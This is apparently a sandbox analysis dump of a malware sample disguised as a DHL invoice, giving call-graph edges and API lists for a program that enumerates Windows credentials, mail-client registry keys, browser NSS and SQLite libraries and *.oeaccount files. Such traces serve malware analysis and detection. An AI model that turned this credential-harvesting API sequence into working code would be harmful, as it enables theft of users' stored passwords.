33377->33379 33380 407a43 33378->33380 33379->33380 33381 40796e 7 API calls 33380->33381 33381->33317 33398 406f96 GetModuleFileNameA 33382->33398 33384 409805 strrchr 33385 409814 33384->33385 33386 409817 _mbscat 33384->33386 33385->33386 33386->33324 33399 44b090 33387->33399 33392 40930c 3 API calls 33393 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33392->33393 33394 4097c5 LoadStringA 33393->33394 33395 4097db 33394->33395 33395->33394 33397 4097f3 33395->33397 33406 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33395->33406 33397->33244 33398->33384 33400 40973e _mbscpy _mbscpy 33399->33400 33401 40930c 33400->33401 33402 44b090 33401->33402 33403 409319 memset GetPrivateProfileStringA 33402->33403 33404 409374 33403->33404 33405 409364 WritePrivateProfileStringA 33403->33405 33404->33392 33405->33404 33406->33395 33417 406f81 GetFileAttributesA 33407->33417 33409 409675 33410 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33409->33410 33416 4096ee 33409->33416 33418 409278 GetPrivateProfileStringA 33410->33418 33412 4096c9 33419 409278 GetPrivateProfileStringA 33412->33419 33414 4096da 33420 409278 GetPrivateProfileStringA 33414->33420 33416->33245 33417->33409 33418->33412 33419->33414 33420->33416 33512 409c1c 33421->33512 33424 401e69 memset 33551 410dbb 33424->33551 33427 401ec2 33581 4070e3 strlen _mbscat _mbscpy _mbscat 33427->33581 33428 401ed4 33566 406f81 GetFileAttributesA 33428->33566 33431 401ee6 strlen strlen 33433 401f15 33431->33433 33434 401f28 33431->33434 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33433->33582 33567 406f81 GetFileAttributesA 33434->33567 33437 401f35 33568 401c31 33437->33568 33440 401f75 33580 410a9c RegOpenKeyExA 33440->33580 33441 401c31 7 API calls 33441->33440 33443 401f91 33444 402187 33443->33444 33445 401f9c memset 33443->33445 33447 402195 ExpandEnvironmentStringsA 33444->33447 33448 4021a8 _strcmpi 33444->33448 33583 410b62 RegEnumKeyExA 33445->33583 33592 406f81 GetFileAttributesA 33447->33592 33448->33337 33448->33338 33450 40217e RegCloseKey 33450->33444 33451 401fd9 atoi 33452 401fef memset memset sprintf 33451->33452 33460 401fc9 33451->33460 33584 410b1e 33452->33584 33455 402165 33455->33450 33456 402076 memset memset strlen strlen 33456->33460 33457 4070e3 strlen _mbscat _mbscpy _mbscat 33457->33460 33458 4020dd strlen strlen 33458->33460 33459 406f81 GetFileAttributesA 33459->33460 33460->33450 33460->33451 33460->33455 33460->33456 33460->33457 33460->33458 33460->33459 33461 402167 _mbscpy 33460->33461 33591 410b62 RegEnumKeyExA 33460->33591 33461->33450 33463 40c422 33462->33463 33464 40c425 _mbscat _mbscpy _mbscpy 33462->33464 33463->33464 33465 40c49d 33464->33465 33466 40c512 33465->33466 33467 40c502 GetWindowPlacement 33465->33467 33468 40c538 33466->33468 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33466->33613 33467->33466 33606 409b31 33468->33606 33472 40ba28 33473 40ba87 33472->33473 33479 40ba3c 33472->33479 33616 406c62 LoadCursorA SetCursor 33473->33616 33475 40ba8c 33617 410a9c RegOpenKeyExA 33475->33617 33618 404785 33475->33618 33621 403c16 33475->33621 33697 4107f1 33475->33697 33700 404734 33475->33700 33476 40ba43 _mbsicmp 33476->33479 33477 40baa0 33478 407e30 _strcmpi 33477->33478 33482 40bab0 33478->33482 33479->33473 33479->33476 33708 40b5e5 10 API calls 33479->33708 33480 40bafa SetCursor 33480->33345 33482->33480 33483 40baf1 qsort 33482->33483 33483->33480 34070 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33489->34070 33491 40b00e 33492 40b016 33491->33492 33493 40b01f GetStdHandle 33491->33493 34071 406d1a CreateFileA 33492->34071 33495 40b01c 33493->33495 33496 40b035 33495->33496 33497 40b12d 33495->33497 34072 406c62 LoadCursorA SetCursor 33496->34072 34076 406d77 9 API calls 33497->34076 33500 40b136 33511 40c580 28 API calls 33500->33511 33501 40b087 33508 40b0a1 33501->33508 34074 40a699 12 API calls 33501->34074 33502 40b042 33502->33501 33502->33508 34073 40a57c strlen WriteFile 33502->34073 33505 40b0d6 33506 40b116 CloseHandle 33505->33506 33507 40b11f SetCursor 33505->33507 33506->33507 33507->33500 33508->33505 34075 406d77 9 API calls 33508->34075 33510->33338 33511->33342 33524 409a32 33512->33524 33515 409c80 memcpy memcpy 33516 409cda 33515->33516 33516->33515 33517 409d18 ??2@YAPAXI ??2@YAPAXI 33516->33517 33518 408db6 12 API calls 33516->33518 33520 409d54 ??2@YAPAXI 33517->33520 33521 409d8b 33517->33521 33518->33516 33520->33521 33534 409b9c 33521->33534 33523 4023c1 33523->33424 33525 409a44 33524->33525 33526 409a3d ??3@YAXPAX 33524->33526 33527 409a52 33525->33527 33528 409a4b ??3@YAXPAX 33525->33528 33526->33525 33529 409a63 33527->33529 33530 409a5c ??3@YAXPAX 33527->33530 33528->33527 33531 409a83 ??2@YAPAXI ??2@YAPAXI 33529->33531 33532 409a73 ??3@YAXPAX 33529->33532 33533 409a7c ??3@YAXPAX 33529->33533 33530->33529 33531->33515 33532->33533 33533->33531 33535 407a55 free 33534->33535 33536 409ba5 33535->33536 33537 407a55 free 33536->33537 33538 409bad 33537->33538 33539 407a55 free 33538->33539 33540 409bb5 33539->33540 33541 407a55 free 33540->33541 33542 409bbd 33541->33542 33543 407a1f 4 API calls 33542->33543 33544 409bd0 33543->33544 33545 407a1f 4 API calls 33544->33545 33546 409bda 33545->33546 33547 407a1f 4 API calls 33546->33547 33548 409be4 33547->33548 33549 407a1f 4 API calls 33548->33549 33550 409bee 33549->33550 33550->33523 33552 410d0e 2 API calls 33551->33552 33553 410dca 33552->33553 33554 410dfd memset 33553->33554 33593 4070ae 33553->33593 33556 410e1d 33554->33556 33596 410a9c RegOpenKeyExA 33556->33596 33558 401e9e strlen strlen 33558->33427 33558->33428 33560 410e4a 33561 410e7f _mbscpy 33560->33561 33597 410d3d _mbscpy 33560->33597 33561->33558 33563 410e5b 33598 410add RegQueryValueExA 33563->33598 33565 410e73 RegCloseKey 33565->33561 33566->33431 33567->33437 33599 410a9c RegOpenKeyExA 33568->33599 33570 401c4c 33571 401cad 33570->33571 33600 410add RegQueryValueExA 33570->33600 33571->33440 33571->33441 33573 401c6a 33574 401c71 strchr 33573->33574 33575 401ca4 RegCloseKey 33573->33575 33574->33575 33576 401c85 strchr 33574->33576 33575->33571 33576->33575 33577 401c94 33576->33577 33601 406f06 strlen 33577->33601 33579 401ca1 33579->33575 33580->33443 33581->33428 33582->33434 33583->33460 33604 410a9c RegOpenKeyExA 33584->33604 33586 410b34 33587 410b5d 33586->33587 33605 410add RegQueryValueExA 33586->33605 33587->33460 33589 410b4c RegCloseKey 33589->33587 33591->33460 33592->33448 33594 4070bd GetVersionExA 33593->33594 33595 4070ce 33593->33595 33594->33595 33595->33554 33595->33558 33596->33560 33597->33563 33598->33565 33599->33570 33600->33573 33602 406f17 33601->33602 33603 406f1a memcpy 33601->33603 33602->33603 33603->33579 33604->33586 33605->33589 33607 409b40 33606->33607 33608 409b4e 33606->33608 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33608->33610 33611 409b8b 33608->33611 33610->33472 33615 409868 SendMessageA 33611->33615 33613->33468 33614->33608 33615->33610 33616->33475 33617->33477 33619 4047a3 33618->33619 33620 404799 FreeLibrary 33618->33620 33619->33477 33620->33619 33622 4107f1 FreeLibrary 33621->33622 33623 403c30 LoadLibraryA 33622->33623 33624 403c74 33623->33624 33625 403c44 GetProcAddress 33623->33625 33627 4107f1 FreeLibrary 33624->33627 33625->33624 33626 403c5e 33625->33626 33626->33624 33630 403c6b 33626->33630 33628 403c7b 33627->33628 33629 404734 3 API calls 33628->33629 33631 403c86 33629->33631 33630->33628 33709 4036e5 33631->33709 33634 4036e5 27 API calls 33635 403c9a 33634->33635 33636 4036e5 27 API calls 33635->33636 33637 403ca4 33636->33637 33638 4036e5 27 API calls 33637->33638 33639 403cae 33638->33639 33721 4085d2 33639->33721 33647 403ce5 33648 403cf7 33647->33648 33904 402bd1 40 API calls 33647->33904 33769 410a9c RegOpenKeyExA 33648->33769 33651 403d0a 33652 403d1c 33651->33652 33905 402bd1 40 API calls 33651->33905 33770 402c5d 33652->33770 33656 4070ae GetVersionExA 33657 403d31 33656->33657 33788 410a9c RegOpenKeyExA 33657->33788 33659 403d51 33660 403d61 33659->33660 33906 402b22 47 API calls 33659->33906 33789 410a9c RegOpenKeyExA 33660->33789 33663 403d87 33664 403d97 33663->33664 33907 402b22 47 API calls 33663->33907 33790 410a9c RegOpenKeyExA 33664->33790 33667 403dbd 33668 403dcd 33667->33668 33908 402b22 47 API calls 33667->33908 33791 410808 33668->33791 33672 404785 FreeLibrary 33673 403de8 33672->33673 33795 402fdb 33673->33795 33676 402fdb 34 API calls 33677 403e00 33676->33677 33811 4032b7 33677->33811 33686 403e3b 33687 403e73 33686->33687 33688 403e46 _mbscpy 33686->33688 33858 40fb00 33687->33858 33910 40f334 334 API calls 33688->33910 33698 410807 33697->33698 33699 4107fc FreeLibrary 33697->33699 33698->33477 33699->33698 33701 404785 FreeLibrary 33700->33701 33702 40473b LoadLibraryA 33701->33702 33703 40474c GetProcAddress 33702->33703 33704 40476e 33702->33704 33703->33704 33705 404764 33703->33705 33706 404781 33704->33706 33707 404785 FreeLibrary 33704->33707 33705->33704 33706->33477 33707->33706 33708->33479 33710 4036fb 33709->33710 33713 4037c5 33709->33713 33911 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33710->33911 33712 40370e 33712->33713 33714 403716 strchr 33712->33714 33713->33634 33714->33713 33715 403730 33714->33715 33912 4021b6 memset 33715->33912 33717 40373f _mbscpy _mbscpy strlen 33718 4037a4 _mbscpy 33717->33718 33719 403789 sprintf 33717->33719 33913 4023e5 16 API calls 33718->33913 33719->33718 33722 4085e2 33721->33722 33914 4082cd 11 API calls 33722->33914 33726 408600 33727 403cba 33726->33727 33728 40860b memset 33726->33728 33739 40821d 33727->33739 33917 410b62 RegEnumKeyExA 33728->33917 33730 408637 33731 4086d2 RegCloseKey 33730->33731 33733 40865c memset 33730->33733 33918 410a9c RegOpenKeyExA 33730->33918 33921 410b62 RegEnumKeyExA 33730->33921 33731->33727 33919 410add RegQueryValueExA 33733->33919 33736 408694 33920 40848b 10 API calls 33736->33920 33738 4086ab RegCloseKey 33738->33730 33922 410a9c RegOpenKeyExA 33739->33922 33741 40823f 33742 403cc6 33741->33742 33743 408246 memset 33741->33743 33751 4086e0 33742->33751 33923 410b62 RegEnumKeyExA 33743->33923 33745 4082bf RegCloseKey 33745->33742 33747 40826f 33747->33745 33924 410a9c RegOpenKeyExA 33747->33924 33925 4080ed 11 API calls 33747->33925 33926 410b62 RegEnumKeyExA 33747->33926 33750 4082a2 RegCloseKey 33750->33747 33927 4045db 33751->33927 33755 40872d 33757 408737 wcslen 33755->33757 33759 4088ef 33755->33759 33757->33759 33765 40876a 33757->33765 33758 40872b CredEnumerateW 33758->33755 33935 404656 33759->33935 33760 40877a wcsncmp 33760->33765 33762 404734 3 API calls 33762->33765 33763 404785 FreeLibrary 33763->33765 33764 408812 memset 33764->33765 33766 40883c memcpy wcschr 33764->33766 33765->33759 33765->33760 33765->33762 33765->33763 33765->33764 33765->33766 33767 4088c3 LocalFree 33765->33767 33938 40466b _mbscpy 33765->33938 33766->33765 33767->33765 33768 410a9c RegOpenKeyExA 33768->33647 33769->33651 33939 410a9c RegOpenKeyExA 33770->33939 33772 402c7a 33773 402da5 33772->33773 33774 402c87 memset 33772->33774 33773->33656 33940 410b62 RegEnumKeyExA 33774->33940 33776 402d9c RegCloseKey 33776->33773 33777 410b1e 3 API calls 33778 402ce4 memset sprintf 33777->33778 33941 410a9c RegOpenKeyExA 33778->33941 33780 402d28 33781 402d3a sprintf 33780->33781 33942 402bd1 40 API calls 33780->33942 33943 410a9c RegOpenKeyExA 33781->33943 33784 402cb2 33784->33776 33784->33777 33787 402d9a 33784->33787 33944 402bd1 40 API calls 33784->33944 33945 410b62 RegEnumKeyExA 33784->33945 33787->33776 33788->33659 33789->33663 33790->33667 33792 410816 33791->33792 33793 4107f1 FreeLibrary 33792->33793 33794 403ddd 33793->33794 33794->33672 33946 410a9c RegOpenKeyExA 33795->33946 33797 402ff9 33798 403006 memset 33797->33798 33799 40312c 33797->33799 33947 410b62 RegEnumKeyExA 33798->33947 33799->33676 33801 403122 RegCloseKey 33801->33799 33802 410b1e 3 API calls 33803 403058 memset sprintf 33802->33803 33948 410a9c RegOpenKeyExA 33803->33948 33805 403033 33805->33801 33805->33802 33806 4030a2 memset 33805->33806 33807 410b62 RegEnumKeyExA 33805->33807 33809 4030f9 RegCloseKey 33805->33809 33950 402db3 26 API calls 33805->33950 33949 410b62 RegEnumKeyExA 33806->33949 33807->33805 33809->33805 33812 4032d5 33811->33812 33813 4033a9 33811->33813 33951 4021b6 memset 33812->33951 33826 4034e4 memset memset 33813->33826 33815 4032e1 33952 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33815->33952 33817 4032ea 33818 4032f8 memset GetPrivateProfileSectionA 33817->33818 33953 4023e5 16 API calls 33817->33953 33818->33813 33823 40332f 33818->33823 33820 40339b strlen 33820->33813 33820->33823 33822 403350 strchr 33822->33823 33823->33813 33823->33820 33954 4021b6 memset 33823->33954 33955 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33823->33955 33956 4023e5 16 API calls 33823->33956 33827 410b1e 3 API calls 33826->33827 33828 40353f 33827->33828 33829 40357f 33828->33829 33830 403546 _mbscpy 33828->33830 33834 403985 33829->33834 33957 406d55 strlen _mbscat 33830->33957 33832 403565 _mbscat 33958 4033f0 19 API calls 33832->33958 33959 40466b _mbscpy 33834->33959 33838 4039aa 33840 4039ff 33838->33840 33960 40f460 memset memset 33838->33960 33981 40f6e2 33838->33981 33999 4038e8 21 API calls 33838->33999 33841 404785 FreeLibrary 33840->33841 33842 403a0b 33841->33842 33843 4037ca memset memset 33842->33843 34007 444551 memset 33843->34007 33846 4038e2 33846->33686 33909 40f334 334 API calls 33846->33909 33848 40382e 33849 406f06 2 API calls 33848->33849 33850 403843 33849->33850 33851 406f06 2 API calls 33850->33851 33852 403855 strchr 33851->33852 33853 403884 _mbscpy 33852->33853 33854 403897 strlen 33852->33854 33856 4038bf _mbscpy 33853->33856 33855 4038a4 sprintf 33854->33855 33854->33856 33855->33856 34019 4023e5 16 API calls 33856->34019 33859 44b090 33858->33859 33860 40fb10 RegOpenKeyExA 33859->33860 33861 403e7f 33860->33861 33862 40fb3b RegOpenKeyExA 33860->33862 33872 40f96c 33861->33872 33863 40fb55 RegQueryValueExA 33862->33863 33864 40fc2d RegCloseKey 33862->33864 33865 40fc23 RegCloseKey 33863->33865 33866 40fb84 33863->33866 33864->33861 33865->33864 33867 404734 3 API calls 33866->33867 33868 40fb91 33867->33868 33868->33865 33869 40fc19 LocalFree 33868->33869 33870 40fbdd memcpy memcpy 33868->33870 33869->33865 34024 40f802 11 API calls 33870->34024 33873 4070ae GetVersionExA 33872->33873 33874 40f98d 33873->33874 33875 4045db 7 API calls 33874->33875 33879 40f9a9 33875->33879 33876 40fae6 33877 404656 FreeLibrary 33876->33877 33878 403e85 33877->33878 33884 4442ea memset 33878->33884 33879->33876 33880 40fa13 memset WideCharToMultiByte 33879->33880 33880->33879 33881 40fa43 _strnicmp 33880->33881 33881->33879 33882 40fa5b WideCharToMultiByte 33881->33882 33882->33879 33883 40fa88 WideCharToMultiByte 33882->33883 33883->33879 33885 410dbb 9 API calls 33884->33885 33886 444329 33885->33886 34025 40759e strlen strlen 33886->34025 33891 410dbb 9 API calls 33892 444350 33891->33892 33893 40759e 3 API calls 33892->33893 33894 44435a 33893->33894 33895 444212 65 API calls 33894->33895 33896 444366 memset memset 33895->33896 33897 410b1e 3 API calls 33896->33897 33898 4443b9 ExpandEnvironmentStringsA strlen 33897->33898 33899 4443f4 _strcmpi 33898->33899 33900 4443e5 33898->33900 33901 403e91 33899->33901 33902 44440c 33899->33902 33900->33899 33901->33477 33903 444212 65 API calls 33902->33903 33903->33901 33904->33648 33905->33652 33906->33660 33907->33664 33908->33668 33909->33686 33910->33687 33911->33712 33912->33717 33913->33713 33915 40841c 33914->33915 33916 410a9c RegOpenKeyExA 33915->33916 33916->33726 33917->33730 33918->33730 33919->33736 33920->33738 33921->33730 33922->33741 33923->33747 33924->33747 33925->33750 33926->33747 33928 404656 FreeLibrary 33927->33928 33929 4045e3 LoadLibraryA 33928->33929 33930 404651 33929->33930 33931 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33929->33931 33930->33755 33930->33758 33930->33759 33932 40463d 33931->33932 33933 404643 33932->33933 33934 404656 FreeLibrary 33932->33934 33933->33930 33934->33930 33936 403cd2 33935->33936 33937 40465c FreeLibrary 33935->33937 33936->33768 33937->33936 33938->33765 33939->33772 33940->33784 33941->33780 33942->33781 33943->33784 33944->33784 33945->33784 33946->33797 33947->33805 33948->33805 33949->33805 33950->33805 33951->33815 33952->33817 33953->33818 33954->33822 33955->33823 33956->33823 33957->33832 33958->33829 33959->33838 34000 4078ba 33960->34000 33963 4078ba _mbsnbcat 33964 40f5a3 RegOpenKeyExA 33963->33964 33965 40f5c3 RegQueryValueExA 33964->33965 33966 40f6d9 33964->33966 33967 40f6d0 RegCloseKey 33965->33967 33968 40f5f0 33965->33968 33966->33838 33967->33966 33968->33967 33969 40f675 33968->33969 34004 40466b _mbscpy 33968->34004 33969->33967 34005 4012ee strlen 33969->34005 33971 40f611 33973 404734 3 API calls 33971->33973 33978 40f616 33973->33978 33974 40f69e RegQueryValueExA 33974->33967 33975 40f6c1 33974->33975 33975->33967 33976 40f66a 33977 404785 FreeLibrary 33976->33977 33977->33969 33978->33976 33979 40f661 LocalFree 33978->33979 33980 40f645 memcpy 33978->33980 33979->33976 33980->33979 34006 40466b _mbscpy 33981->34006 33983 40f6fa 33984 4045db 7 API calls 33983->33984 33985 40f708 33984->33985 33986 40f7e2 33985->33986 33987 404734 3 API calls 33985->33987 33988 404656 FreeLibrary 33986->33988 33989 40f715 33987->33989 33990 40f7f1 33988->33990 33989->33986 33991 40f71d CredReadA 33989->33991 33992 404785 FreeLibrary 33990->33992 33991->33986 33994 40f734 33991->33994 33993 40f7fc 33992->33993 33993->33838 33994->33986 33994->33994 33995 40f797 WideCharToMultiByte 33994->33995 33996 40f7b8 strlen 33995->33996 33997 40f7d9 LocalFree 33995->33997 33996->33997 33998 40f7c8 _mbscpy 33996->33998 33997->33986 33998->33997 33999->33838 34001 4078e6 34000->34001 34002 4078c7 _mbsnbcat 34001->34002 34003 4078ea 34001->34003 34002->34001 34003->33963 34004->33971 34005->33974 34006->33983 34020 410a9c RegOpenKeyExA 34007->34020 34009 44458b 34010 40381a 34009->34010 34021 410add RegQueryValueExA 34009->34021 34010->33846 34018 4021b6 memset 34010->34018 34012 4445dc RegCloseKey 34012->34010 34013 4445a4 34013->34012 34022 410add RegQueryValueExA 34013->34022 34015 4445c1 34015->34012 34023 444879 30 API calls 34015->34023 34017 4445da 34017->34012 34018->33848 34019->33846 34020->34009 34021->34013 34022->34015 34023->34017 34024->33869 34026 4075c9 34025->34026 34027 4075bb _mbscat 34025->34027 34028 444212 34026->34028 34027->34026 34045 407e9d 34028->34045 34031 44424d 34032 444274 34031->34032 34033 444258 34031->34033 34053 407ef8 34031->34053 34034 407e9d 9 API calls 34032->34034 34066 444196 52 API calls 34033->34066 34041 4442a0 34034->34041 34036 407ef8 9 API calls 34036->34041 34037 4442ce 34063 407f90 34037->34063 34041->34036 34041->34037 34043 444212 65 API calls 34041->34043 34067 407e62 strcmp strcmp 34041->34067 34042 407f90 FindClose 34044 4442e4 34042->34044 34043->34041 34044->33891 34046 407f90 FindClose 34045->34046 34047 407eaa 34046->34047 34048 406f06 2 API calls 34047->34048 34049 407ebd strlen strlen 34048->34049 34050 407ee1 34049->34050 34051 407eea 34049->34051 34068 4070e3 strlen _mbscat _mbscpy _mbscat 34050->34068 34051->34031 34054 407f03 FindFirstFileA 34053->34054 34055 407f24 FindNextFileA 34053->34055 34056 407f3f 34054->34056 34057 407f46 strlen strlen 34055->34057 34058 407f3a 34055->34058 34056->34057 34060 407f7f 34056->34060 34057->34060 34061 407f76 34057->34061 34059 407f90 FindClose 34058->34059 34059->34056 34060->34031 34069 4070e3 strlen _mbscat _mbscpy _mbscat 34061->34069 34064 407fa3 34063->34064 34065 407f99 FindClose 34063->34065 34064->34042 34065->34064 34066->34031 34067->34041 34068->34051 34069->34060 34070->33491 34071->33495 34072->33502 34073->33501 34074->33508 34075->33505 34076->33500 34421 43ffc8 18 API calls 34235 4281cc 15 API calls 34423 4383cc 110 API calls 34236 4275d3 41 API calls 34424 4153d3 22 API calls 34237 444dd7 _XcptFilter 34429 4013de 15 API calls 34431 425115 111 API calls 34432 43f7db 18 API calls 34435 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34239 4335ee 16 API calls 34437 429fef 11 API calls 34240 444deb _exit _c_exit 34438 40bbf0 138 API calls 34243 425115 79 API calls 34442 437ffa 22 API calls 34247 4021ff 14 API calls 34248 43f5fc 149 API calls 34443 40e381 9 API calls 34250 405983 40 API calls 34251 42b186 27 API calls 34252 427d86 76 API calls 34253 403585 20 API calls 34255 42e58e 18 API calls 34258 425115 75 API calls 34260 401592 8 API calls 33158 410b92 33161 410a6b 33158->33161 33160 410bb2 33162 410a77 33161->33162 33163 410a89 GetPrivateProfileIntA 33161->33163 33166 410983 memset _itoa WritePrivateProfileStringA 33162->33166 33163->33160 33165 410a84 33165->33160 33166->33165 34447 434395 16 API calls 34262 441d9c memcmp 34449 43f79b 119 API calls 34263 40c599 43 API calls 34450 426741 87 API calls 34267 4401a6 21 API calls 34269 426da6 memcpy memset memset memcpy 34270 4335a5 15 API calls 34272 4299ab memset memset memcpy memset memset 34273 40b1ab 8 API calls 34455 425115 76 API calls 34459 4113b2 18 API calls 34463 40a3b8 memset sprintf SendMessageA 34077 410bbc 34080 4109cf 34077->34080 34081 4109dc 34080->34081 34082 410a23 memset GetPrivateProfileStringA 34081->34082 34083 4109ea memset 34081->34083 34088 407646 strlen 34082->34088 34093 4075cd sprintf memcpy 34083->34093 34086 410a65 34087 410a0c WritePrivateProfileStringA 34087->34086 34089 40765a 34088->34089 34090 40765c 34088->34090 34089->34086 34092 4076a3 34090->34092 34094 40737c strtoul 34090->34094 34092->34086 34093->34087 34094->34090 34275 40b5bf memset memset _mbsicmp

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                                      • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                                      • String ID: ACD
                                                                                                                                                                                                                                      • API String ID: 379999529-620537770
                                                                                                                                                                                                                                      • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                                                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                                                                      • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402003
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402086
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402018
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
